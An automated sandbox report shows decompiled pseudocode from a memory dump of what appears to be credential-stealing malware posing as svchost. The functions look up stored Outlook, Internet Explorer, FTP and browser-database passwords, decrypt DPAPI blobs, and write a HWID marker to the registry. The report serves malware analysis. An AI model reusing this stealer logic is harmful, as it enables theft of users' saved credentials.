                                                                                                                                        0x0bc09f22
                                                                                                                                        0x0bc09f27
                                                                                                                                        0x0bc09f2d
                                                                                                                                        0x0bc09f34
                                                                                                                                        0x0bc09f3a
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09f43
                                                                                                                                        0x0bc09f4a
                                                                                                                                        0x0bc09f4b
                                                                                                                                        0x0bc09f4c
                                                                                                                                        0x0bc09f52
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09f54
                                                                                                                                        0x0bc09f59
                                                                                                                                        0x0bc09f5c
                                                                                                                                        0x0bc09fb2
                                                                                                                                        0x0bc09fb2
                                                                                                                                        0x0bc09fb6
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09f61
                                                                                                                                        0x0bc09f63
                                                                                                                                        0x0bc09f65
                                                                                                                                        0x0bc09f70
                                                                                                                                        0x0bc09f73
                                                                                                                                        0x0bc09f67
                                                                                                                                        0x0bc09f67
                                                                                                                                        0x0bc09f6c
                                                                                                                                        0x0bc09f6c
                                                                                                                                        0x0bc09f77
                                                                                                                                        0x0bc09f7a
                                                                                                                                        0x0bc09f7c
                                                                                                                                        0x0bc09f9a
                                                                                                                                        0x0bc09f9b
                                                                                                                                        0x0bc09f9c
                                                                                                                                        0x0bc09f7e
                                                                                                                                        0x0bc09f86
                                                                                                                                        0x0bc09f8c
                                                                                                                                        0x0bc09f8d
                                                                                                                                        0x0bc09f94
                                                                                                                                        0x0bc09f94
                                                                                                                                        0x0bc09fa0
                                                                                                                                        0x0bc09fa3
                                                                                                                                        0x0bc09fa6
                                                                                                                                        0x0bc09fa8
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09faa
                                                                                                                                        0x0bc09faa
                                                                                                                                        0x0bc09fac
                                                                                                                                        0x0bc09faf
                                                                                                                                        0x0bc09faf
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09faf
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09fa8
                                                                                                                                        0x0bc09fb8
                                                                                                                                        0x0bc09fc1
                                                                                                                                        0x0bc09f24
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09fc1
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09f52
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09f27
                                                                                                                                        0x0bc09f1c
                                                                                                                                        0x0bc09f0f
                                                                                                                                        0x0bc09fcd
                                                                                                                                        0x0bc09fdb

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LdrGetProcedureAddressRtlInitAnsiStringLdrLoadDll$RtlCreateUnicodeStringFromAsciiz$ll$oadD
                                                                                                                                        • API String ID: 0-3329835957
                                                                                                                                        • Opcode ID: 8284fc9a10188ebac1a68dacfcc85b9413b508cc2e2aca1cecd542ac080aa454
                                                                                                                                        • Instruction ID: 4d34d09f432e9f4e4972f8c1a59adcbe827332905b658a334a2b7902f3ca9976
                                                                                                                                        • Opcode Fuzzy Hash: 8284fc9a10188ebac1a68dacfcc85b9413b508cc2e2aca1cecd542ac080aa454
                                                                                                                                        • Instruction Fuzzy Hash: 4D5106B1D203089FCF11CFD9C981AEEBBB9BF05600F648069E515AB242DB70AA45CF55
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.20%

                                                                                                                                        Function 0BC05E3A, Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 139stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 34%
                                                                                                                                        			E0BC05E3A(void* __ecx, intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v1032;
				char _v2056;
				char _v3080;
				char _v3084;
				intOrPtr _v3088;
				short* _v3092;
				char _v3096;
				char _v3100;
				intOrPtr _v3104;
				int _v3108;
				int _v3112;
				intOrPtr _v3116;
				char _v3120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t46;
				void* _t68;
				intOrPtr _t85;
				signed int _t87;

				_t46 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t46 ^ _t87;
				_v3088 = _a8;
				_t73 = _a20;
				_v3092 = _a12;
				_v3104 = _a16;
				_t85 = _a4;
				E0BC0491E(_t73, __ecx, _t85,  &_v2056);
				_push(0);
				_push( &_v3100);
				_push(_v3088);
				_push(_t85);
				_push(0);
				_push(_t73);
				if( *((intOrPtr*)( *_t73 + 0x28))() >= 0) {
					WideCharToMultiByte(0, 0,  *(_v3100 + 4), 0xffffffff,  &_v1032, 0x3ff, 0, 0);
					__imp__CoTaskMemFree(_v3100);
				}
				WideCharToMultiByte(0, 0, _v3092, 0xffffffff,  &_v3080, 0x3ff, 0, 0);
				_v3120 = 0x10;
				_v3116 = 2;
				_v3112 = 0;
				_v3108 = 0;
				_t59 =  *((intOrPtr*)( *_t73 + 0x44))(_t73, 0, _t85, _v3088, _v3092,  &_v3096,  &_v3084,  &_v3120, 0);
				if(_v3096 != 0 && _v3084 != 0) {
					_t85 = lstrcmpiA;
					if(lstrcmpiA( &_v2056, "identification") == 0 || lstrcmpiA( &_v2056, "identitymgr") == 0) {
						if(lstrcmpiA( &_v1032, "inetcomm server passwords") != 0) {
							if(lstrcmpiA( &_v1032, "outlook account manager passwords") != 0) {
								if(lstrcmpiA( &_v1032, "identities") != 0) {
									goto L10;
								} else {
									_push(0);
									_push(_v3088);
									_push(_v3092);
									_push(0xbeef0007);
									goto L9;
								}
							} else {
								_t68 = 0xbeef0006;
								goto L8;
							}
							L16:
						} else {
							_t68 = 0xbeef0005;
							L8:
							_push(1);
							_push(_v3088);
							_push(_v3092);
							_push(_t68);
							L9:
							_t73 = _v3104;
							_t84 = _v3096;
							_t59 = E0BC05D2B(_v3104, _v3084, _v3096);
						}
					}
					L10:
					__imp__CoTaskMemFree(_v3084);
				}
				return E0BC09FDC(_t59, _t73, _v8 ^ _t87, _t84, _t85, 0);
				goto L16;
			}
























                                                                                                                                        0x0bc05e43
                                                                                                                                        0x0bc05e4a
                                                                                                                                        0x0bc05e50
                                                                                                                                        0x0bc05e5a
                                                                                                                                        0x0bc05e5d
                                                                                                                                        0x0bc05e67
                                                                                                                                        0x0bc05e6e
                                                                                                                                        0x0bc05e7b
                                                                                                                                        0x0bc05e86
                                                                                                                                        0x0bc05e8d
                                                                                                                                        0x0bc05e8e
                                                                                                                                        0x0bc05e94
                                                                                                                                        0x0bc05e95
                                                                                                                                        0x0bc05e96
                                                                                                                                        0x0bc05e9c
                                                                                                                                        0x0bc05eb9
                                                                                                                                        0x0bc05ec5
                                                                                                                                        0x0bc05ec5
                                                                                                                                        0x0bc05ee3
                                                                                                                                        0x0bc05f07
                                                                                                                                        0x0bc05f17
                                                                                                                                        0x0bc05f24
                                                                                                                                        0x0bc05f2a
                                                                                                                                        0x0bc05f30
                                                                                                                                        0x0bc05f39
                                                                                                                                        0x0bc05f43
                                                                                                                                        0x0bc05f59
                                                                                                                                        0x0bc05f7d
                                                                                                                                        0x0bc05fd8
                                                                                                                                        0x0bc05ff1
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc05ff3
                                                                                                                                        0x0bc05ff3
                                                                                                                                        0x0bc05ff4
                                                                                                                                        0x0bc05ffa
                                                                                                                                        0x0bc06000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06000
                                                                                                                                        0x0bc05fda
                                                                                                                                        0x0bc05fda
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc05fda
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc05f7f
                                                                                                                                        0x0bc05f7f
                                                                                                                                        0x0bc05f84
                                                                                                                                        0x0bc05f84
                                                                                                                                        0x0bc05f86
                                                                                                                                        0x0bc05f8c
                                                                                                                                        0x0bc05f92
                                                                                                                                        0x0bc05f93
                                                                                                                                        0x0bc05f93
                                                                                                                                        0x0bc05f99
                                                                                                                                        0x0bc05fa5
                                                                                                                                        0x0bc05faa
                                                                                                                                        0x0bc05f7d
                                                                                                                                        0x0bc05fad
                                                                                                                                        0x0bc05fb3
                                                                                                                                        0x0bc05fb3
                                                                                                                                        0x0bc05fc7
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC0491E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000,?,00000000,?,?,00000000), ref: 0BC0494C
                                                                                                                                          • Part of subcall function 0BC0491E: CoTaskMemFree.OLE32(?,?,00000000,?,?,00000000), ref: 0BC04955
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0BC05EB9
                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 0BC05EC5
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0BC05EE3
                                                                                                                                        • lstrcmpiA.KERNEL32(?,identification), ref: 0BC05F55
                                                                                                                                        • lstrcmpiA.KERNEL32(?,identitymgr), ref: 0BC05F67
                                                                                                                                        • lstrcmpiA.KERNEL32(?,inetcomm server passwords), ref: 0BC05F79
                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 0BC05FB3
                                                                                                                                        • lstrcmpiA.KERNEL32(?,outlook account manager passwords), ref: 0BC05FD4
                                                                                                                                        • lstrcmpiA.KERNEL32(?,identities), ref: 0BC05FED
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpi$ByteCharFreeMultiTaskWide
                                                                                                                                        • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                                                                                                                                        • API String ID: 636431001-4287852900
                                                                                                                                        • Opcode ID: 60efff7665865bd7df21b898b16a2bd3454457f85b93879385d6463c1a101453
                                                                                                                                        • Instruction ID: b1c6782f6857a44e9a2350b7d0b8525bcc70d060167d7db9b9e2e7ceb6952409
                                                                                                                                        • Opcode Fuzzy Hash: 60efff7665865bd7df21b898b16a2bd3454457f85b93879385d6463c1a101453
                                                                                                                                        • Instruction Fuzzy Hash: 30512EB1921128EBEB20DB55CD84EDABBBDEF49650F0046D5FA09E2181DF709B85CF60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        Function 0BC069E3, Relevance: 21.1, APIs: 6, Strings: 8, Instructions: 69stringUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC069E3(CHAR* _a4, intOrPtr _a8) {
				char _v8;
				CHAR* _v12;
				intOrPtr _v16;
				CHAR* _v20;
				CHAR* _v24;
				CHAR* _v28;
				void* __edi;
				char* _t15;
				void* _t18;
				signed int _t28;
				CHAR* _t29;
				void* _t33;

				_t29 = _a4;
				E0BC09AF4(_t29);
				_t15 = StrStrIA(_t29, " ");
				_t28 = 0;
				if(_t15 == 0) {
					return 0;
				}
				 *_t15 = 0;
				E0BC09AF4(_t29);
				_v28 = "CONSTRAINT";
				_v24 = "PRIMARY";
				_v20 = "UNIQUE";
				_v16 = "CHECK";
				_v12 = "FOREIGN";
				_v8 = 0;
				while(lstrcmpiA( *(_t33 + _t28 * 4 - 0x18), _t29) != 0) {
					_t28 = _t28 + 1;
					if(_t28 < 6) {
						continue;
					}
					if(lstrlenA(_t29) != 0) {
						if(lstrcmpiA(_t29, "hostname") != 0) {
							if(lstrcmpiA(_t29, "encryptedPassword") != 0) {
								if(lstrcmpiA(_t29, "encryptedUsername") == 0) {
									 *0xbc10d4c = _a8;
								}
							} else {
								 *0xbc10d20 = _a8;
							}
						} else {
							 *0xbc10d58 = _a8;
						}
						_t18 = 1;
						L14:
						return _t18;
					}
					break;
				}
				_t18 = 0;
				goto L14;
			}















                                                                                                                                        0x0bc069eb
                                                                                                                                        0x0bc069ee
                                                                                                                                        0x0bc069f9
                                                                                                                                        0x0bc069ff
                                                                                                                                        0x0bc06a03
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06a05
                                                                                                                                        0x0bc06a0d
                                                                                                                                        0x0bc06a0f
                                                                                                                                        0x0bc06a1a
                                                                                                                                        0x0bc06a21
                                                                                                                                        0x0bc06a28
                                                                                                                                        0x0bc06a2f
                                                                                                                                        0x0bc06a36
                                                                                                                                        0x0bc06a3d
                                                                                                                                        0x0bc06a40
                                                                                                                                        0x0bc06a4b
                                                                                                                                        0x0bc06a4f
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06a5a
                                                                                                                                        0x0bc06a6a
                                                                                                                                        0x0bc06a80
                                                                                                                                        0x0bc06a96
                                                                                                                                        0x0bc06a9b
                                                                                                                                        0x0bc06a9b
                                                                                                                                        0x0bc06a82
                                                                                                                                        0x0bc06a85
                                                                                                                                        0x0bc06a85
                                                                                                                                        0x0bc06a6c
                                                                                                                                        0x0bc06a6f
                                                                                                                                        0x0bc06a6f
                                                                                                                                        0x0bc06aa2
                                                                                                                                        0x0bc06aa3
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06aa3
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06a5a
                                                                                                                                        0x0bc06a5c
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC09AF4: lstrlenA.KERNEL32(?,?,0BC02C6D), ref: 0BC09B49
                                                                                                                                        • StrStrIA.SHLWAPI(?,0BC0D7DC), ref: 0BC069F9
                                                                                                                                        • lstrcmpiA.KERNEL32(0BC0DA30,?), ref: 0BC06A45
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0BC06A52
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$lstrcmpi
                                                                                                                                        • String ID: CHECK$CONSTRAINT$FOREIGN$PRIMARY$UNIQUE$encryptedPassword$encryptedUsername$hostname
                                                                                                                                        • API String ID: 1808961391-3777071345
                                                                                                                                        • Opcode ID: 1b32111c77ca1ba984af6a85aedaaa34c705f77729cfc4ddb0cc9f031589110e
                                                                                                                                        • Instruction ID: 3d252539fe9e258e2a2af782e527374c6fef5cf7e855ccd82ed781ebd47b0966
                                                                                                                                        • Opcode Fuzzy Hash: 1b32111c77ca1ba984af6a85aedaaa34c705f77729cfc4ddb0cc9f031589110e
                                                                                                                                        • Instruction Fuzzy Hash: 7411B470B31206AF8B00FFA59C8496F7BF8EA45598700C476EC13E6291EF70D611AAA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC02C5D, Relevance: 21.1, APIs: 6, Strings: 8, Instructions: 69stringUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC02C5D(CHAR* _a4, intOrPtr _a8) {
				char _v8;
				CHAR* _v12;
				intOrPtr _v16;
				CHAR* _v20;
				CHAR* _v24;
				CHAR* _v28;
				void* __edi;
				char* _t15;
				void* _t18;
				signed int _t28;
				CHAR* _t29;
				void* _t33;

				_t29 = _a4;
				E0BC09AF4(_t29);
				_t15 = StrStrIA(_t29, " ");
				_t28 = 0;
				if(_t15 == 0) {
					return 0;
				}
				 *_t15 = 0;
				E0BC09AF4(_t29);
				_v28 = "CONSTRAINT";
				_v24 = "PRIMARY";
				_v20 = "UNIQUE";
				_v16 = "CHECK";
				_v12 = "FOREIGN";
				_v8 = 0;
				while(lstrcmpiA( *(_t33 + _t28 * 4 - 0x18), _t29) != 0) {
					_t28 = _t28 + 1;
					if(_t28 < 6) {
						continue;
					}
					if(lstrlenA(_t29) != 0) {
						if(lstrcmpiA(_t29, "action_url") != 0) {
							if(lstrcmpiA(_t29, "password_value") != 0) {
								if(lstrcmpiA(_t29, "username_value") == 0) {
									 *0xbc10d18 = _a8;
								}
							} else {
								 *0xbc10d40 = _a8;
							}
						} else {
							 *0xbc10d60 = _a8;
						}
						_t18 = 1;
						L14:
						return _t18;
					}
					break;
				}
				_t18 = 0;
				goto L14;
			}















                                                                                                                                        0x0bc02c65
                                                                                                                                        0x0bc02c68
                                                                                                                                        0x0bc02c73
                                                                                                                                        0x0bc02c79
                                                                                                                                        0x0bc02c7d
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc02c7f
                                                                                                                                        0x0bc02c87
                                                                                                                                        0x0bc02c89
                                                                                                                                        0x0bc02c94
                                                                                                                                        0x0bc02c9b
                                                                                                                                        0x0bc02ca2
                                                                                                                                        0x0bc02ca9
                                                                                                                                        0x0bc02cb0
                                                                                                                                        0x0bc02cb7
                                                                                                                                        0x0bc02cba
                                                                                                                                        0x0bc02cc5
                                                                                                                                        0x0bc02cc9
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc02cd4
                                                                                                                                        0x0bc02ce4
                                                                                                                                        0x0bc02cfa
                                                                                                                                        0x0bc02d10
                                                                                                                                        0x0bc02d15
                                                                                                                                        0x0bc02d15
                                                                                                                                        0x0bc02cfc
                                                                                                                                        0x0bc02cff
                                                                                                                                        0x0bc02cff
                                                                                                                                        0x0bc02ce6
                                                                                                                                        0x0bc02ce9
                                                                                                                                        0x0bc02ce9
                                                                                                                                        0x0bc02d1c
                                                                                                                                        0x0bc02d1d
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc02d1d
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc02cd4
                                                                                                                                        0x0bc02cd6
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC09AF4: lstrlenA.KERNEL32(?,?,0BC02C6D), ref: 0BC09B49
                                                                                                                                        • StrStrIA.SHLWAPI(?,0BC0D7DC), ref: 0BC02C73
                                                                                                                                        • lstrcmpiA.KERNEL32(0BC0DA30,?), ref: 0BC02CBF
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0BC02CCC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$lstrcmpi
                                                                                                                                        • String ID: CHECK$CONSTRAINT$FOREIGN$PRIMARY$UNIQUE$action_url$password_value$username_value
                                                                                                                                        • API String ID: 1808961391-315308160
                                                                                                                                        • Opcode ID: 916d158c776eb85a832560cba4d0eb778a1333bdd63e6b9491d2ca2545128a27
                                                                                                                                        • Instruction ID: 280bba07be5b177455d40353d73563d4ef557128d93031e216dbb23a7c0b5620
                                                                                                                                        • Opcode Fuzzy Hash: 916d158c776eb85a832560cba4d0eb778a1333bdd63e6b9491d2ca2545128a27
                                                                                                                                        • Instruction Fuzzy Hash: 3911B970B35216BE8B00DFA59C88A6F7FF8FA459847104475EC13EA291EF70DA45DAA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC04C40, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 128stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                        			E0BC04C40(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v12;
				char _v1040;
				char _v2064;
				intOrPtr _v2068;
				char _v2072;
				short* _v2076;
				char _v2080;
				intOrPtr _v2084;
				void* _v2088;
				char _v2092;
				intOrPtr _v2096;
				char _v2100;
				int _v2104;
				int _v2108;
				intOrPtr _v2112;
				char _v2116;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t46;
				signed int _t60;
				signed int _t63;
				signed int _t66;
				intOrPtr _t77;
				void* _t88;
				intOrPtr* _t89;
				signed int _t91;

				_t88 = __edx;
				_t46 =  *0xbc10000; // 0xbb40e64e
				_v12 = _t46 ^ _t91;
				_v2068 = _a8;
				_t77 = _a4;
				_v2076 = _a12;
				_v2084 = _a16;
				_t89 = _a20;
				E0BC0491E(_t89, __ecx, _t77,  &_v1040);
				WideCharToMultiByte(0, 0, _v2076, 0xffffffff,  &_v2064, 0x3ff, 0, 0);
				_v2116 = 0x10;
				_v2112 = 2;
				_v2108 = 0;
				_v2104 = 0;
				_t57 =  *((intOrPtr*)( *_t89 + 0x44))(_t89, 0, _t77, _v2068, _v2076,  &_v2080,  &_v2072,  &_v2116, 0);
				if(_v2080 == 0 || _v2072 == 0) {
					L10:
					return E0BC09FDC(_t57, _t77, _v12 ^ _t91, _t88, _t89, 0);
				} else {
					_t89 = lstrcmpiA;
					_t60 = lstrcmpiA( &_v1040, "Internet Explorer");
					asm("sbb eax, eax");
					_t57 =  ~_t60 + 1;
					if( ~_t60 + 1 == 0) {
						_t63 = lstrcmpiA( &_v1040, "WininetCacheCredentials");
						asm("sbb eax, eax");
						_t57 =  ~_t63 + 1;
						if( ~_t63 + 1 == 0) {
							_t66 = lstrcmpiA( &_v1040, "MS IE FTP Passwords");
							asm("sbb eax, eax");
							_t57 =  ~_t66 + 1;
							if( ~_t66 + 1 == 0) {
								if(StrStrIA( &_v2064, "DPAPI: ") == 0) {
									_t57 = E0BC04B07(_v2084, _v2076, _v2072, _v2080);
								} else {
									_v2100 = _v2080;
									_v2096 = _v2072;
									if(E0BC01000( &_v2100, 0,  &_v2092) != 0) {
										E0BC04B07(_v2084, _v2076, _v2088, _v2092);
										_t57 = LocalFree(_v2088);
									}
								}
							}
						}
					}
					__imp__CoTaskMemFree(_v2072);
					goto L10;
				}
			}






























                                                                                                                                        0x0bc04c40
                                                                                                                                        0x0bc04c49
                                                                                                                                        0x0bc04c50
                                                                                                                                        0x0bc04c56
                                                                                                                                        0x0bc04c60
                                                                                                                                        0x0bc04c63
                                                                                                                                        0x0bc04c6d
                                                                                                                                        0x0bc04c74
                                                                                                                                        0x0bc04c81
                                                                                                                                        0x0bc04ca2
                                                                                                                                        0x0bc04cc6
                                                                                                                                        0x0bc04cd6
                                                                                                                                        0x0bc04ce3
                                                                                                                                        0x0bc04ce9
                                                                                                                                        0x0bc04cef
                                                                                                                                        0x0bc04cf8
                                                                                                                                        0x0bc04e08
                                                                                                                                        0x0bc04e16
                                                                                                                                        0x0bc04d0a
                                                                                                                                        0x0bc04d0a
                                                                                                                                        0x0bc04d1c
                                                                                                                                        0x0bc04d20
                                                                                                                                        0x0bc04d22
                                                                                                                                        0x0bc04d23
                                                                                                                                        0x0bc04d35
                                                                                                                                        0x0bc04d39
                                                                                                                                        0x0bc04d3b
                                                                                                                                        0x0bc04d3c
                                                                                                                                        0x0bc04d4e
                                                                                                                                        0x0bc04d52
                                                                                                                                        0x0bc04d54
                                                                                                                                        0x0bc04d55
                                                                                                                                        0x0bc04d6f
                                                                                                                                        0x0bc04df4
                                                                                                                                        0x0bc04d71
                                                                                                                                        0x0bc04d77
                                                                                                                                        0x0bc04d83
                                                                                                                                        0x0bc04da2
                                                                                                                                        0x0bc04dc1
                                                                                                                                        0x0bc04dcf
                                                                                                                                        0x0bc04dcf
                                                                                                                                        0x0bc04da2
                                                                                                                                        0x0bc04d6f
                                                                                                                                        0x0bc04d55
                                                                                                                                        0x0bc04d3c
                                                                                                                                        0x0bc04e02
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc04e02

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC0491E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000,?,00000000,?,?,00000000), ref: 0BC0494C
                                                                                                                                          • Part of subcall function 0BC0491E: CoTaskMemFree.OLE32(?,?,00000000,?,?,00000000), ref: 0BC04955
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0BC04CA2
                                                                                                                                        • lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0BC04D1C
                                                                                                                                        • lstrcmpiA.KERNEL32(?,WininetCacheCredentials), ref: 0BC04D35
                                                                                                                                        • lstrcmpiA.KERNEL32(?,MS IE FTP Passwords), ref: 0BC04D4E
                                                                                                                                        • StrStrIA.SHLWAPI(?,DPAPI: ), ref: 0BC04D67
                                                                                                                                          • Part of subcall function 0BC01000: LoadLibraryA.KERNEL32(Crypt32.dll), ref: 0BC01008
                                                                                                                                          • Part of subcall function 0BC01000: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 0BC01014
                                                                                                                                          • Part of subcall function 0BC04B07: lstrlenW.KERNEL32(?), ref: 0BC04B16
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0BC04DCF
                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 0BC04E02
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Freelstrcmpi$ByteCharMultiTaskWide$AddressLibraryLoadLocalProclstrlen
                                                                                                                                        • String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
                                                                                                                                        • API String ID: 546506139-3076635702
                                                                                                                                        • Opcode ID: 58bcf04aba1a50f4b97153809b16df455677b88a013f921074f6ae59c044260b
                                                                                                                                        • Instruction ID: 0a463ee3beba161a93ce0069a31fe69384aa045d567325105bcacba7ca86d68e
                                                                                                                                        • Opcode Fuzzy Hash: 58bcf04aba1a50f4b97153809b16df455677b88a013f921074f6ae59c044260b
                                                                                                                                        • Instruction Fuzzy Hash: 4941097192112DABCB24AF64CC45ADABBF8FF08700F0481E5A559A2280DF319B95CFE0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.14%

                                                                                                                                        Function 0BC09812, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 117registryfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                        			E0BC09812(char* __ecx, void* __edx, int _a4) {
				signed int _v8;
				char _v272;
				long _v276;
				CHAR* _v280;
				void* _v284;
				void* _v288;
				char* _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				long _t34;
				long _t36;
				void* _t41;
				CHAR* _t44;
				void* _t45;
				void* _t64;
				signed int _t67;

				_t64 = __edx;
				_t31 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t31 ^ _t67;
				_t66 = __ecx;
				_v292 = __ecx;
				_v276 = 0;
				_t34 = RegCreateKeyA( *0xbc10010, "Software\\Skype",  &_v284);
				_t65 = "HWID";
				if(_t34 != 0) {
					L4:
					_t66 = 0x104;
					_t36 = GetTempPathA(0x104,  &_v272);
					if(_t36 != 0 && _t36 <= 0x104) {
						CreateDirectoryA( &_v272, 0);
						_t66 =  &_v272;
						_t41 = E0BC08F95(_t66);
						_push(_t66);
						if(_t41 != 0) {
							_t44 = E0BC08EE2(_t65);
						} else {
							E0BC08EE2("\\");
							_t44 = E0BC08F32(_t66, _t65);
						}
						_v280 = _t44;
						_t45 = CreateFileA(_t44, 0xc0000000, 3, 0, 2, 0, 0);
						_v288 = _t45;
						if(_t45 == 0xffffffff) {
							L17:
							DeleteFileA(_v280);
						} else {
							_t65 = _a4;
							_t66 = 0;
							while(1) {
								_v276 = 0;
								if(WriteFile(_v288, _v292 + _t66, _t65,  &_v276, 0) == 0 || _v276 == 0) {
									break;
								}
								_t66 =  &(_t66[_v276]);
								_t65 = _t65 - _v276;
								if(_t65 != 0) {
									continue;
								} else {
									_v276 = 1;
								}
								L16:
								CloseHandle(_v288);
								if(_v276 == 0) {
									goto L17;
								}
								goto L18;
							}
							_v276 = 0;
							goto L16;
						}
						L18:
						E0BC08D3D(_v280);
					}
				} else {
					if(RegSetValueExA(_v284, "HWID", 0, 3, _t66, _a4) == 0) {
						_v276 = 1;
					}
					RegCloseKey(_v284);
					if(_v276 == 0) {
						goto L4;
					}
				}
				return E0BC09FDC(_v276, 0, _v8 ^ _t67, _t64, _t65, _t66);
			}





















                                                                                                                                        0x0bc09812
                                                                                                                                        0x0bc0981b
                                                                                                                                        0x0bc09822
                                                                                                                                        0x0bc0983a
                                                                                                                                        0x0bc0983e
                                                                                                                                        0x0bc09844
                                                                                                                                        0x0bc0984a
                                                                                                                                        0x0bc09850
                                                                                                                                        0x0bc09857
                                                                                                                                        0x0bc09893
